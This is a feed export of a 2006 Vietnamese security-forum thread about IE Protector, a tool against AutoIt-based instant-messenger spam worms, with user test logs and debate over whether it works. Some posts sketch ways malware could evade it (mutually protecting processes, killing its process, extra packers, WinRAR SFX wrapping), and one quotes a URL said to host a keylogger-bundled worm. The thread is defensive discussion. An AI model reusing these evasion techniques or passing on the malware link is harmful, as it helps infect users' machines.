<![CDATA[Latest posts for the topic "Phòng chống các loại SPIM được viết bằng AutoIt"]]> /hvaonline/posts/list/8.html JForum - http://www.jforum.net Phòng chống các loại SPIM được viết bằng AutoIt _ Cơn bão "AutoIt SPIM" đang ngày một lan truyền mạnh trong giới script kiddie. Bắt đầu từ sự việc SPIM gaixinh, đến nay đã xuất hiện rất nhiều biến thể gaixinh như funni, yhbest... _ Nhằm ngăn chặn đại dịch AutoIt SPIM này, FireLion Co., Ltd đã cho ra chương trình [FireLion] IE Protector. _ Với [FireLion] IE Protector, bạn có thể yên tâm không phải lo lắng về những chú script kiddie và những biến thể được viết bằng AutoIt nữa. [FireLion] IE Protector có những tính năng chính sau: + Ngăn chặn AutoIt program ngay trước khi được thực thi + Bảo vệ IE khỏi các 0 day exploit (những lỗi chưa được công bố của IE)   http://fire-lion.com/software/IEProtector/
Thanks all.]]>
/hvaonline/posts/list/4002.html#23532 /hvaonline/posts/list/4002.html#23532 GMT
Phòng chống các loại SPIM được viết bằng AutoIt

LeVuHoang wrote:
hello all, Hoàng vừa finish xong cái soft này tối nay. Chưa có thời giờ kiểm chứng nhiều lắm. Hy vọng là sẽ giảm cái tệ nạn AutoIt của mấy chú script kiddie hiện nay. http://fire-lion.com/software/IEProtector/ Thanks all. 
Excellent work and thanks LVH :)).]]>
/hvaonline/posts/list/4002.html#23534 /hvaonline/posts/list/4002.html#23534 GMT
Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#23553 /hvaonline/posts/list/4002.html#23553 GMT Re: Phòng chống các loại SPIM được viết bằng AutoIt Đang kiểm tra "D:\Software\MyTools\autoruns.exe" : Không phải AutoIt Đang kiểm tra "D:\Software\MyTools\autorunsc.exe" : Không phải AutoIt Đang kiểm tra "D:\Software\MyTools\Filemon.exe" : Không phải AutoIt Đang kiểm tra "D:\Software\MyTools\MyTools.zip" : Không phải AutoIt Đang kiểm tra "D:\Software\MyTools\procexp.exe" : Không phải AutoIt  Cái thằng proexp.exe cũng có số fận giống hệt với thằng Autoruns.exe.]]> /hvaonline/posts/list/4002.html#23560 /hvaonline/posts/list/4002.html#23560 GMT Re: Phòng chống các loại SPIM được viết bằng AutoIt tất cả các ctr mở thêm. Sao vậy????
Tự tiêu diệt: "C:\Documents and Settings\ssssss\Application Data\Mozilla\Firefox\Profiles\7zjs8na3.default\FlashGot.exe" C:\DOCUME~1\ssssss\LOCALS~1\Temp\flashgot.7zjs8na3.default\flashgot.fgt Tự tiêu diệt: C:\Program Files\FlashGet\flashget.exe Tự tiêu diệt: C:\Program Files\FlashGet\flashget.exe 
]]>
/hvaonline/posts/list/4002.html#23576 /hvaonline/posts/list/4002.html#23576 GMT
Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#23584 /hvaonline/posts/list/4002.html#23584 GMT Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#23586 /hvaonline/posts/list/4002.html#23586 GMT Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#23590 /hvaonline/posts/list/4002.html#23590 GMT Re: Phòng chống các loại SPIM được viết bằng AutoIt Tự tiêu diệt: D:\putty.exe Tự tiêu diệt: D:\lannetscan.exe Tự tiêu diệt: D:\Software\MyTools\VPN\Copy of Uninstall.exe Tự tiêu diệt: D:\Downloads\Entertainment\Copy of mars3d.exe Tự tiêu diệt: D:\Downloads\Entertainment\Copy (3) of mars3d.exe Tự tiêu diệt: D:\Downloads\Entertainment\Copy (2) of mars3d.exe  Nó 'chơi' kiểu đó khi tớ bật "Tự động loại bỏ các chương trình AutoIT". :roll: :evil: ]]> /hvaonline/posts/list/4002.html#23598 /hvaonline/posts/list/4002.html#23598 GMT Phòng chống các loại SPIM được viết bằng AutoIt Code:
+ Phiên bản 1.3:
_ Chỉnh lại chức năng AutoRun
_ Sửa lỗi chức năng "Tự động diệt"
_ Cho phép lưu lại log file
to TQN: Nó quét dựa trên signature đặc trưng của AutoIt anh :D]]>
/hvaonline/posts/list/4002.html#23609 /hvaonline/posts/list/4002.html#23609 GMT
Re: Phòng chống các loại SPIM được viết bằng AutoIt Đang kiểm tra "d:\downloads\avh\misc\ieprotector13\ieprot.exe" : AutoIt  :lol:) Chào H., cậu 'Kiểm tra toàn bộ máy' thì cũng nên chừa cậu ra chứ. Trường hợp này xảy ra khi bật 'Tự chạy mỗi khi Windows khởi động'. Nên chỉnh tự chạy ở Key HKLM hơn là HKCU. ]]> /hvaonline/posts/list/4002.html#23613 /hvaonline/posts/list/4002.html#23613 GMT Re: Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#23624 /hvaonline/posts/list/4002.html#23624 GMT Phòng chống các loại SPIM được viết bằng AutoIt Chào H., cậu 'Kiểm tra toàn bộ máy' thì cũng nên chừa cậu ra chứ. Trường hợp này xảy ra khi bật 'Tự chạy mỗi khi Windows khởi động'.   uh uh, quên check chỗ này phần scan registry :P. Phần Process thì bỏ rồi... Còn về HKLM, đâu phải user nào cũng có quyền admin ;) ?
Lão Hoàng ơi ! Vui lòng thông báo là chỉ download bản IEProtector chỉ từ địa chỉ http://fire-lion.com/. Chứ ngày hôm nay đã có con virus thông báo là để gỡ bỏ các virus viết bằng AutoIt hãy vào trang web http://....... Nhưng vào trang đó là có chứa mã độc  
Trang nào thì lão seamoun post lên luôn để mọi người còn tránh :D]]>
/hvaonline/posts/list/4002.html#23646 /hvaonline/posts/list/4002.html#23646 GMT
Phòng chống các loại SPIM được viết bằng AutoIt http://www.innology.com.vn cho vấn đề này ;)) -m ]]> /hvaonline/posts/list/4002.html#23651 /hvaonline/posts/list/4002.html#23651 GMT Re: Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#23663 /hvaonline/posts/list/4002.html#23663 GMT Re: Phòng chống các loại SPIM được viết bằng AutoIt

hackernohat wrote:
Em xin có chút ý kiến Là bác đã tính tới vụ script AutoIt nó tắt process của bác chưa ? thứ 2 là bác chỉ có thể end từng process 1 trong 1 thời gian rất ngắn nhưng nếu tên tạo AutoItscript đó tạo ra 2 process để protect cho nhau và kết hợp với việc end cái process của bác thì .... thật khó lường 8)) .  
Theo tôi bác Hoang đã comment rằng cái này là chuyên trị mấy chú script kiddies,mà đã là script kiddies thì e là không có khả năng tạo ra một con Autoit "khủng " đến vậy.Theo tôi nếu bồ thực sự có khả năng thì cũng nên làm thử một chương trình bằng Autoit có chức năng giống như bồ nói như trên xem sao?]]>
/hvaonline/posts/list/4002.html#23669 /hvaonline/posts/list/4002.html#23669 GMT
Phòng chống các loại SPIM được viết bằng AutoIt Đó là tất cả những gì IEProtector làm được nhưng rất tiếc là bây nhiêu đó thì chưa đủ để giải quyết trọn vẹn bài toán SPIM và virus trên YIM.   và đó là giải pháp thích hợp để phòng chống SPIM nói chung và phòng chống các 0-day exploit nói riêng. Cho dù IE có lỗi cũng không execute được các mã lệnh độc hại được down xuống từ web. === hackernohat
Hey sau khi ngồi ngâm chán chê cái đoạn PE của autoit nói thật em chả tìn thấy cái sign nào cho cam để diệt AutoIt Script cả ,mong bác cho xin ý kiến về cái sign mà bác đã dùng để nhận diện các script autoit.  
Đâu nhất thiết lúc nào cũng phải là PE header ;). Tìm thêm xem...
Là bác đã tính tới vụ script AutoIt nó tắt process của bác chưa ? thứ 2 là bác chỉ có thể end từng process 1 trong 1 thời gian rất ngắn nhưng nếu tên tạo  
Chương trình thì cũng giống như virus thôi. Nếu nó muốn end-process của mình thì phải lấy 1 signature nào đó để detect rồi kill. Nhưng nếu có version mới thì kill thế nào ;) ?
AutoItscript đó tạo ra 2 process để protect cho nhau và kết hợp với việc end cái process của bác thì .... thật khó lường .  
Trong thực tế thì việc này không đúng. Nó chỉ đúng với người dùng. Tức trong khi người dùng đang "loay hoay" gõ lệnh kill process thứ 2 thì nó thực thi lại. Với IEProtection, ngay khi vừa kill process. Chương trình đã lập tức delete tập tin bị nhiễm. Nếu SPIM muốn execute 1 instance nữa lên thì cần phải có thời gian tạo file mới --> sẽ bị kill ngay lập tức. Trong phiên bản sau. Chương trình sẽ được cập nhật tính năng chống kill process IEProtection. Thanks all]]>
/hvaonline/posts/list/4002.html#23691 /hvaonline/posts/list/4002.html#23691 GMT
Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#23713 /hvaonline/posts/list/4002.html#23713 GMT Phòng chống các loại SPIM được viết bằng AutoIt + 16/09/2006: _ Không cho phép End Task (kill process) [FireLion] IE Protector. Chức năng này sẽ vô hiệu hoá những SPIM có ý đồ muốn tắt chương trình. _ Vô hiệu hoá nút Close. Để tránh ứng dụng AutoIt gởi message WM_CLOSE đến để đóng chương trình. [FireLion] IE Protector đã tắt message này và thêm vào nút Thoát. Bạn có thể nhấn vào nút này để kết thúc chương trình. _ Chức năng Tiến trình _ Sử dụng bộ công cụ setup tiếng Việt uSetup cho bản cài đặt.   Xem thêm tại: http://fire-lion.com/software/IEProtector/]]> /hvaonline/posts/list/4002.html#23822 /hvaonline/posts/list/4002.html#23822 GMT Re: Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#23944 /hvaonline/posts/list/4002.html#23944 GMT Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#23948 /hvaonline/posts/list/4002.html#23948 GMT Phòng chống các loại SPIM được viết bằng AutoIt Em đề nghị bác nhân rộng tầm phủ sóng của program này bằng cách đặt nó lên càng nhiều nơi cho down càng tốt ,càng rộng thì nó sẽ đến đc tay của hầu hết ngưởi dùng internet ở Việt Nam   Như trên đã nói, chỉ down từ 1 địa chỉ sẽ giúp loại bỏ các phiên bản giả dạng :). Làm sao chắc rằng download từ 1 nơi nào đó sẽ an toàn ?
bác nên làm cho giao diện đơn giản hơn tới mức ,người có chỉ số IQ <0 cũng hiểu đc  
Xem F.A.Q một tí nào...
+ Có cách nào để tôi không phải làm gì mà vẫn được bảo vệ không ? _ lol... Một câu hỏi hay :D. Câu trả lời là không. Nhưng may mắn thay, đối với AutoIt thì câu trả lời là ĐƯỢC. Nếu bạn không làm gì "dính dáng" đến AutoIt, hãy chọn chức năng "Tự động cấm IE thực thi chương trình" và "Tự động loại bỏ các chương trình AutoIt". Thế là có thể an tâm không sợ các phiên bản viết bằng AutoIt nữa. Ghi nhớ là chỉ "ngủ ngon" với AutoIt SPIM thôi nhé ;)  
Thứ 2 ,em đã thử suy nghĩ và tìm ra một cách mà autoitscript chơi gọn program của bác là cũng ý tưởng tạo 2 process.  
Đã thử với phiên bản 2.0 chưa ? Bản 2.0 đã tích hợp chức năng chống kill process. Nếu vẫn có thể qua mặt được IE Protector, bạn vui lòng up tập tin lên đâu đó rồi PM Hoàng địa chỉ để download. Trong trường hợp máy chưa bị nhiễm AutoIt, bạn chỉ cần kích hoạt chức năng "Chống IE tự chạy..." thì do dù bạn có pack, có viết bằng AutoIt hay bất kỳ chương trình nào khác cũng sẽ không bị nhiễm. Thử xem ;)
em thấy một khuyết điểm là khi bind 2 con virus vào một file exe đc nén bằng thuật ASPack thì IEprotector ko thể detect đc  
Đã test với UPX, ASPack, ASProtect. Vẫn detect được :)]]>
/hvaonline/posts/list/4002.html#23974 /hvaonline/posts/list/4002.html#23974 GMT
Phòng chống các loại SPIM được viết bằng AutoIt

LeVuHoang wrote:
Trả lời từng người một... hì hì... === mrro Chương trình này sẽ ngăn chặn không chỉ ở bước 4 mà là ở bước 3 & 4. Khi người dùng click vào link, IE mở lên (nhưng chưa kịp chạy) malware, chương trình đã scan và auto delete trước khi nó kịp thực thi (cách mà các Anti Virus thường làm để quét file trước khi file được thực thi file). Ngoài ra, nếu người dùng hoặc 1 trang muốn ép (0-day exploit) IE chạy một file nào đó. Chương trình sẽ hiện lên 1 bảng confirm xem có cho phép hay không. Nếu không cho phép, chương trình sẽ lập tức deny và hành động execute file đó xem như chưa bao giờ xảy ra. Như vậy giải pháp đã được triệt để ở bước 3 + 4. ....... và đó là giải pháp thích hợp để phòng chống SPIM nói chung và phòng chống các 0-day exploit nói riêng. Cho dù IE có lỗi cũng không execute được các mã lệnh độc hại được down xuống từ web.  
Tui nói giải pháp của bồ LeVuHoang chưa thể giải quyết triệt để chống SPIM và 0-day exploit nói riêng vì những lý do (và quan ngại) sau đây: 1. Thực ra, xét một cách tổng quát, IEProtector cũng chỉ là một chương trình antivirus. Chúng ta đã có quá nhiều chương trình antivirus, và tác dụng của những chương trình này thì mọi người đều cũng đã rõ. Nếu chúng thật sự làm được việc thì có lẽ virus, spyware, trojan hay các loại malware nói chung đều đã được đưa vào viện bảo tàng. Tui thật sự nghi ngờ vào khả năng làm việc hiệu quả của IEProtector. 2. Tui cho là cách tiếp cận vấn đề của bồ LeVuHoang trong trường hợp này là chưa chính xác. IEProtector (nếu làm việc hiệu quả) là một chương trình tốt nhưng bản thân nó không thể giải quyết vấn đề SPIM trên YIM đơn giản vì nó chỉ được kích hoạt khi user đã đọc msg và click vào link. Cứ giả định IEProtector có thể phát hiện được hết tất cả các loại malware, ngăn chặn được hết 0-day exploit (một điều mà tui rất nghi ngờ) thì vẫn có ít nhất hai trường hợp sau đây IEProtector không thể làm được gì: - SPIM không có link. - User sử dụng một browser khác IE. Tui cho rằng muốn giải quyết triệt để vấn đề SPIM, chúng ta cần tiếp cận ở bước thứ 2. Ý tưởng cơ bản nhất là làm sao để user không còn nhận được SPIM. Đó cũng là cách lâu nay chúng ta đối phó với vấn đề SPAM mail. -m]]>
/hvaonline/posts/list/4002.html#24006 /hvaonline/posts/list/4002.html#24006 GMT
Phòng chống các loại SPIM được viết bằng AutoIt 1. Thực ra, xét một cách tổng quát, IEProtector cũng chỉ là một chương trình antivirus. Chúng ta đã có quá nhiều chương trình antivirus, và tác dụng của những chương trình này thì mọi người đều cũng đã rõ. Nếu chúng thật sự làm được việc thì có lẽ virus, spyware, trojan hay các loại malware nói chung đều đã được đưa vào viện bảo tàng. Tui thật sự nghi ngờ vào khả năng làm việc hiệu quả của IEProtector.   Đầu tiên, IE Protect không phải là 1 Anti Virus :). Thứ hai, IE Protector chỉ có chức năng scan AutoIt
nó chỉ được kích hoạt khi user đã đọc msg và click vào link. Cứ giả định IEProtector có thể phát hiện được hết tất cả các loại malware  
Ngay khi user có click vào link đi chăng nữa. Malware cũng KHÔNG THỂ ĐƯỢC THỰC THI :). Đơn giản là vì chương trình đã chặn trước khi IE tự động thực thi các ứng dụng được down từ internet xuống. Nếu malware không được thực thi, thì người dùng bị infected như thế nào ;) ?
ngăn chặn được hết 0-day exploit (một điều mà tui rất nghi ngờ) thì vẫn có ít nhất  
Như trên đã nói, IE không thực thi được thì cho dù có lỗi 0 day thì malware vẫn không thể infect được.
- SPIM không có link.  
Tui chưa hiểu ý mrro. Có lẽ mrro nói là chương trình có thể diệt được tất cả malware, virus ? Không. Đơn thuần là chống AutoIt và không cho IE tự thực thi các ứng dụng lạ từ internet mà thôi.
- User sử dụng một browser khác IE.  
Chương trình này là IE Protector ;). Các browser khác sẽ được support tương lai. Để mrro hiểu rõ hơn cách IE Protector hoạt động và vì sao nó không thể bị dù có là 0 day exploit. Mrro thử làm theo cách sau: + Thực thi IE Protector + Thiết lập chế độ "Cấm IE thực thi..." Rồi làm 1 ví dụ nào đó bypass được xem ;)]]>
/hvaonline/posts/list/4002.html#24017 /hvaonline/posts/list/4002.html#24017 GMT
Phòng chống các loại SPIM được viết bằng AutoIt 1. Tác giả kích hoạt virus bằng cách gửi một msg chứa đường link đến virus cho friend list của mình. 2. Một nhóm người trong friend list của tác giả click vào đường link. 3. Browser của họ (có thể là IE hoặc Firefox) download và chạy con virus (một cách tự động hoặc không tự động). 4. Virus nhiễm vào máy tính của những người này và nó bắt đầu quay lại thực hiện bước 1 với một hoặc nhiều msg khác nhau.   IEProtector bảo vệ user ở bước 3 và 4 nhưng vấn đề của SPIM là nằm ở bước thứ 2: chúng ta cần phải bảo vệ user để họ không thấy SPIM. Nếu họ không thấy SPIM thì sẽ không có chuyện click vào đường link. Nếu họ không click vào đường link thì sẽ không cần IEProtector. Rõ ràng IEProtector chỉ cần thiết khi user đã thấy, đã đọc và đã click vào link, nghĩa là đã nhận SPIM rồi. Do đó nói IEProtector có thể chống SPIM là sai. Nó chỉ có khả năng giúp user bảo vệ IE của mình, đúng như tên gọi của nó mà thôi.
Để mrro hiểu rõ hơn cách IE Protector hoạt động và vì sao nó không thể bị dù có là 0 day exploit. Mrro thử làm theo cách sau: + Thực thi IE Protector + Thiết lập chế độ "Cấm IE thực thi..." Rồi làm 1 ví dụ nào đó bypass được xem ;)  
Hì đây lại là một chuyện hoàn toàn khác. Bản thân tui không có hứng thú với IEProtector nhưng bồ LeVuHoang cần phải chú ý điểm này: - IEProtector có thể phân biệt được đâu là chương trình user thật sự muốn chạy, đâu là virus tự chạy? - mrro không có khả năng bypass được IEProtector thì không có nghĩa là nó an toàn. LeVuHoang không bypass được IEProtector cũng không có nghĩa là nó an toàn. -m]]>
/hvaonline/posts/list/4002.html#24037 /hvaonline/posts/list/4002.html#24037 GMT
Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#24048 /hvaonline/posts/list/4002.html#24048 GMT Phòng chống các loại SPIM được viết bằng AutoIt

LeVuHoang wrote:
uhm, vậy mrro trình bày phương pháp chống mọi loại SPIM xem :D ? 
Nó có ở http://vnhacker.org/hvaonline/posts/list/4087.html.]]>
/hvaonline/posts/list/4002.html#24093 /hvaonline/posts/list/4002.html#24093 GMT
Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#24558 /hvaonline/posts/list/4002.html#24558 GMT Phòng chống các loại SPIM được viết bằng AutoIt SPIM được viết bằng AutoIt không ;) ? Tiếp theo, bạn có thể post hình lên về process và những khoá AutoRun trong registry không.]]> /hvaonline/posts/list/4002.html#24565 /hvaonline/posts/list/4002.html#24565 GMT Phòng chống các loại SPIM được viết bằng AutoIt bai` hoc kinh nghiem ==>Chet' ko duoc lam` con ma doi'===>... http://www33.websamba.com/xomnuocden/dungdedoi.html   Tất cả các dấu hiệu giống hệt những con virus dựa trên code gái xinh. Khoá taskmanager , run , send link hàng loat. v.v]]> /hvaonline/posts/list/4002.html#24568 /hvaonline/posts/list/4002.html#24568 GMT Phòng chống các loại SPIM được viết bằng AutoIt

father_nghia_den wrote:
Chính xác là link này đây anh Hoàng.
bai` hoc kinh nghiem ==>Chet' ko duoc lam` con ma doi'===>... http://www33.websamba.com/xomnuocden/dungdedoi.html  
Tất cả các dấu hiệu giống hệt những con virus dựa trên code gái xinh. Khoá taskmanager , run , send link hàng loat. v.v 
Virus này viết bằng AutoIt, có đính kém một trojan, sau đó đóng gói lại theo WinRAR SFX. Vì vậy IE-Protector không phát hiện được file đóng gói là AutoIt. Nhưng nếu sau khi virus đã thực thi (file YIMBot.exe), IE-Protector có thể phát hiện được khi tiến hành quét bộ nhớ..]]>
/hvaonline/posts/list/4002.html#24585 /hvaonline/posts/list/4002.html#24585 GMT
Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#24622 /hvaonline/posts/list/4002.html#24622 GMT Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#24745 /hvaonline/posts/list/4002.html#24745 GMT Phòng chống các loại SPIM được viết bằng AutoIt

114v wrote:
Anh Hoàng có thể nói sơ qua về cơ chết diệt những con này được không, em thấy cách diệt rất hay. Cảm ơn anh 
Hoàng đã có mô tả qua về cách detect & phòng chống trong thread Anti Virus. Cuối cùng thì cũng test được con quangcoi.exe :D. Đây là một WinRAR SFX bao gồm Perfect Keylogger + YiMBot (AutoIt SPIM). [FireLion] IE Protector vẫn có thể diệt được YiMBot ;) Và sau đây là một số hình ảnh của phiên bản 3.0 sắp ra mắt trong 1 vài ngày tới với những tính năng nổi trội :P: http://fire-lion.com/software/IEProtector/]]>
/hvaonline/posts/list/4002.html#25001 /hvaonline/posts/list/4002.html#25001 GMT
Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#25086 /hvaonline/posts/list/4002.html#25086 GMT Re: Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#25103 /hvaonline/posts/list/4002.html#25103 GMT Phòng chống các loại SPIM được viết bằng AutoIt hình như bác viết cái này bằng delphi thì phải?   uh :D]]> /hvaonline/posts/list/4002.html#25122 /hvaonline/posts/list/4002.html#25122 GMT Re: Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#25132 /hvaonline/posts/list/4002.html#25132 GMT Re: Phòng chống các loại SPIM được viết bằng AutoIt Ngưng thực thi: "C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\IDE\devenv.exe" "C:\Program Files\Microsoft Visual Studio .NET 2003\SDK\v1.1\QuickStart\winforms\samples\printing\simplepad\cs\SimplePad.sln" Ngưng thực thi: "C:\Program Files\Microsoft Visual Studio .NET 2003\SDK\v1.1\QuickStart\winforms\samples\printing\simplepad\cs\SimplePad.exe" Ngưng thực thi: "C:\Program Files\Microsoft Visual Studio .NET 2003\SDK\v1.1\QuickStart\winforms\samples\printing\simplepad\cs\SimplePad.exe" Ngưng thực thi: "C:\Program Files\Microsoft Visual Studio .NET 2003\SDK\v1.1\QuickStart\winforms\samples\printing\simplepad\cs\SimplePad.exe" Ngưng thực thi: "C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\IDE\devenv.exe" "C:\Program Files\Microsoft Visual Studio .NET 2003\SDK\v1.1\QuickStart\winforms\samples\printing\simplepad\cs\SimplePad.csproj" Ngưng thực thi: "C:\Program Files\Microsoft Visual Studio .NET 2003\SDK\v1.1\QuickStart\winforms\samples\printing\simplepad\cs\SimplePad.exe"  bác xem cho em vụ này nữa :mrgreen: ]]> /hvaonline/posts/list/4002.html#25177 /hvaonline/posts/list/4002.html#25177 GMT Re: Phòng chống các loại SPIM được viết bằng AutoIt Em đề nghị bác Levuhoang bổ sung phần theo dõi xem phần mềm đó ghi (hoặc xoá) gì vào Registry (phần mềm bị nghi ngờ) nếu có nó thì những pre _ mới biết cách khống chế được và cũng không vất vả phải xác nhận mỗi khi có động tác ghi vào reg.   version 3.0 sẽ hỏi người dùng xem có cho phép ghi vào những khoá AutoRun hay không.
em đang tìm phần mềm kiểm tra việc ghi vào reg của 1 phần mềm khác mà chưa đựoc, rất mong các bác giúp đỡ. thanks  
Rất tiếc, phần mềm không thể phục vụ chỉ cho mục đích riêng của bạn :D

preBaby wrote:
Ngưng thực thi: "C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\IDE\devenv.exe" "C:\Program Files\Microsoft Visual Studio .NET 2003\SDK\v1.1\QuickStart\winforms\samples\printing\simplepad\cs\SimplePad.sln" Ngưng thực thi: "C:\Program Files\Microsoft Visual Studio .NET 2003\SDK\v1.1\QuickStart\winforms\samples\printing\simplepad\cs\SimplePad.exe" Ngưng thực thi: "C:\Program Files\Microsoft Visual Studio .NET 2003\SDK\v1.1\QuickStart\winforms\samples\printing\simplepad\cs\SimplePad.exe" Ngưng thực thi: "C:\Program Files\Microsoft Visual Studio .NET 2003\SDK\v1.1\QuickStart\winforms\samples\printing\simplepad\cs\SimplePad.exe" Ngưng thực thi: "C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\IDE\devenv.exe" "C:\Program Files\Microsoft Visual Studio .NET 2003\SDK\v1.1\QuickStart\winforms\samples\printing\simplepad\cs\SimplePad.csproj" Ngưng thực thi: "C:\Program Files\Microsoft Visual Studio .NET 2003\SDK\v1.1\QuickStart\winforms\samples\printing\simplepad\cs\SimplePad.exe" bác xem cho em vụ này nữa :mrgreen:  
Bạn có thể vào phần Cấu Hình, bỏ tuỳ chọn "Không cho phép IE thực thi"]]>
/hvaonline/posts/list/4002.html#25182 /hvaonline/posts/list/4002.html#25182 GMT
Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#25192 /hvaonline/posts/list/4002.html#25192 GMT Phòng chống các loại SPIM được viết bằng AutoIt http://www.deltavn.net/download/ và không có vấn đề gì. Xin hỏi bạn là tình trạng [FireLion] IE Protector không hoạt động là như thế nào ? Chương trình đã được kích hoạt mà vẫn không chạy ? Máy bạn có cài DeepFreeze không ? Trích từ mục hỏi - đáp (FAQ):
+ Máy tôi đã cài [FireLion] IE Protector những không hoạt động dù đã chọn nút Hoạt động. Tại sao ? _ Có hai nguyên nhân chính sau: . Chương trình được thực thi dưới quyền User. Lúc này, chức năng tự bảo vệ sẽ không hoạt động đúng với bản không cần cài đặt. Bản phải sử dụng phiên bản cài đặt để có thể thực thi dưới quyền User . Chương trình được cài chung với DeepFreeze. Trên nguyên tắc, nếu máy bạn đã cài DeepFreeze rồi thì không phải lo lắng về malware nữa. Tuy nhiên, nếu bạn vẫn muốn [FireLion] IE Protector hoạt động. Bạn phải disable DeepFreeze, dùng bản cài đặt và mở lại (enable) DeepFreeze. Cho tới phiên bản 3.0. Chúng tôi vẫn chưa có kế hoạch cập nhật để có thể chạy với DeepFreeze vì chỉ cần restart là mọi thứ trở lại như cũ.  
]]>
/hvaonline/posts/list/4002.html#25240 /hvaonline/posts/list/4002.html#25240 GMT
Phòng chống các loại SPIM được viết bằng AutoIt + 23/09/2006: _ Phiên bản 3.0 ra mắt với các tính năng vượt trội. _ Nâng cấp scanner. Quét tập tin với tốc độ nhanh gấp 2 lần. _ Thêm chức năng cô lập các chương trình AutoIt. Các tập tin nằm trong quarantine sẽ được mã hoá để tránh các chương trình khác phát hiện nhầm lẫn và người dùng vô tình thực thi. _ Một số công cụ mới được bổ sung: + Startup: Quản lý những chương trình tự thực thi + Theo dõi: Ghi lại nhật ký những thay đổi AutoRun trong Registry + Hosts file: Tránh malware hijack, dẫn người dùng đến những trang khác. Ví dụ, gõ www.google.com lại ra www.abc.com. Xem thêm tại đây. _ Thêm nhiều tuỳ chọn để người dùng dễ dàng hơn trong việc sử dụng _ Chống AutoIt tự nhấn nút Thoát bằng cách hiện random number _ Không cho phép suspend lẫn kill process bởi các chương trình viết bằng AutoIt. _ Thêm tính năng thông báo cho người dùng mỗi khi có phiên bản mới.   Vui lòng truy cập website: http://fire-lion.com/software/IEProtector/ Để biết thêm chi tiết và tải chương trình.]]> /hvaonline/posts/list/4002.html#25243 /hvaonline/posts/list/4002.html#25243 GMT Phòng chống các loại SPIM được viết bằng AutoIt + 23/09/2006: _ Phiên bản 3.0 ra mắt với các tính năng vượt trội. _ Nâng cấp scanner. Quét tập tin với tốc độ nhanh gấp 2 lần. _ Thêm chức năng cô lập các chương trình AutoIt. Các tập tin nằm trong quarantine sẽ được mã hoá để tránh các chương trình khác phát hiện nhầm lẫn và người dùng vô tình thực thi. _ Một số công cụ mới được bổ sung: + Startup: Quản lý những chương trình tự thực thi + Theo dõi: Ghi lại nhật ký những thay đổi AutoRun trong Registry + Hosts file: Tránh malware hijack, dẫn người dùng đến những trang khác. Ví dụ, gõ www.google.com lại ra www.abc.com. Xem thêm tại đây. _ Thêm nhiều tuỳ chọn để người dùng dễ dàng hơn trong việc sử dụng _ Chống AutoIt tự nhấn nút Thoát bằng cách hiện random number _ Không cho phép suspend lẫn kill process bởi các chương trình viết bằng AutoIt. _ Thêm tính năng thông báo cho người dùng mỗi khi có phiên bản mới.   ]]> /hvaonline/posts/list/4002.html#25246 /hvaonline/posts/list/4002.html#25246 GMT Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#25262 /hvaonline/posts/list/4002.html#25262 GMT Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#25270 /hvaonline/posts/list/4002.html#25270 GMT Re: Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#25283 /hvaonline/posts/list/4002.html#25283 GMT Phòng chống các loại SPIM được viết bằng AutoIt Tui có thắc mắc, muốn hỏi Hoàng: các app viết bằng AutoIt đều bị pack = UPX, thì làm sao Hoàng detect được, chả lẽ phải unpack trên memory rồi find AutoIt string à. Nguy hiểm thế.   oh oh, không có anh ơi :)).
Và giả sử App AutoIt bị pack thêm một lần nữa bằng packer nào đó thì sao nhỉ ?  
Có bị pack bằng packer khác hoặc pack thêm 1 lần nữa cũng không sao anh ạ :D. Em đã thử với ASPack, ASProtect, Yoda, PeShield...
Tui cũng nghi ngờ nên test thử rùi,nếu pack thêm phát nữa cũng bị đập thui.Chỉnh cả PE header làm giả PE của msconfig cũng bị túm ( đôi lúc chỉnh PE AutoIT cũng ko chịu chạy )  
:D]]>
/hvaonline/posts/list/4002.html#25351 /hvaonline/posts/list/4002.html#25351 GMT
Phòng chống các loại SPIM được viết bằng AutoIt /hvaonline/posts/list/4002.html#25372 /hvaonline/posts/list/4002.html#25372 GMT Phòng chống các loại SPIM được viết bằng AutoIt vậy lão nbthanh cho [FireLion] IE Protector là vô ích ;) ? Theo ý lão là không nên phát triển nữa ? Hay làm 1 cái vote xem bao nhiêu người đồng ý close dự án [FireLion] IE Protector nhé lão nbthanh :D  Tôi chỉ nói là hướng tiếp cận của nó không mấy thực tiễn! Ví dụ nếu 1 máy đã có cài 1 AV "xịn xịn" chút rồi thì nó đã lo hết mọi chuyện, mà nó lại còn diệt được nhiều virus hơn nữa. Như vậy cái IE_Protector hầu như không còn đất sống. Mà nếu user đã lười, AV còn không chịu cài thì: 1. Họ có bỏ công cài cái IE_Protector? 2. Họ có cài mà không dùng thêm AV hay chương trình bảo vệ nào khác thì cũng chết vì nhiều loại virus khác (Vì đâu phải cứ IE mới truyền được virus, vứ autoit mới tạo ra virus) Do vậy nên tìm 1 hướng đi khác thiết thực hơn! Ví dụ, ngoài Autoit, còn cả tá chương trình tương tự như vậy nữa, BAT2EXE, WStoExe, Perl2Exe. Với 